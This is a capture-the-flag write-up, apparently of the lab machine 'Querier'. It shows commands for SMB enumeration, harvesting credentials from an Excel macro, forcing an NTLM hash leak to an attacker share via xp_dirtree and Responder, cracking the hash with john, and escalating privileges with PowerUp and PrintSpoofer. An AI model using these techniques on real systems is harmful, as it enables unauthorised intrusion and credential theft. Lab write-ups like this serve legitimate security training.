Querier

Published: Apr 15, 2025

Enumeration

Scan

Starting off with a basic nmap scan: 

nmap -sC -sV -oN nmap/init.nmap 10.10.10.125

SMB

Since SMB is open, let's use smbmap to enumerate accessible shares: 

smbmap -u anonymous -H 10.10.10.125

Taking a look at the non-default share "Reports", we find a share called "Currency Volume Report.xlsm". The .xlsm extension signifies a macro enabled Excel document, so let's take a look at the macros in the file: Plaintext credentials! reporting:PcwTWTHRwryjc$c6

Foothold

MSSQL

With our new credentials, let's try connecting to the MSSQL server we learned about from our initial scan.
Using impacket-mssqlclient , we can log in to the SQL Server database: 

impacket-mssqlclient -windows-auth reporting:'PcwTWTHRwryjc$c6'@10.10.10.125
After some looking around, there seems to be no interesting data in the database...

Responder

One thing that is interesting is that xp_dirtree is capable of listing files on the Windows host. We can attempt to abuse this by accessing a remote share that we control and capturing the NTLMv2 hash of the service account.
Setting up Responder: 

sudo responder -I tun0
In the MSSQL client: 
xp_dirtree \\10.10.14.7\doesnotexist

Password Cracking

After putting the hash into a file (e.g. "mssql.hash"), we can crack it using the tool john with the wordlist rockyou.txt 

john mssql.hash --wordlist=/usr/share/wordlist/rockyou.txt
We have successfully recovered valid credentials for the service account! mssql-svc:corporate568

Command Execution

We can use these credentials to log in to the database again, but now we can run xp_cmdshell and get a reverse shell of choice.

Privilege Escalation

Power Up

To look for some quick Privilege Escalation opportunities, let's run PowerUp.ps1 

. .\PowerUp.ps1
Invoke-AllChecks
The script found credentials in a cached "Group Policy Preference" (GPP) file, and automatically decrypted the password for us! Administrator:MyUnclesAreMarioAndLuigi!!1!

Alternate: Privilege Abuse

The script also pointed out that our user has the SeImpersonatePrivilege. This is common for a service account, and it is also a common Privilege Escalation vector. There are many exploits that work here, PrintSpoofer.exe being one of them. 

.\PrintSpoofer.exe -c "command"
After getting an administrative shell, here's a fun way to grab both flags: 
gci -recurse -erroraction SielntlyContinue -Path C:\Users -force | ?{$_.Name -eq "user.txt" -or $_.Name -eq "root.txt"} | %{Write-Host "$($_.Name):";gc $_.FullName}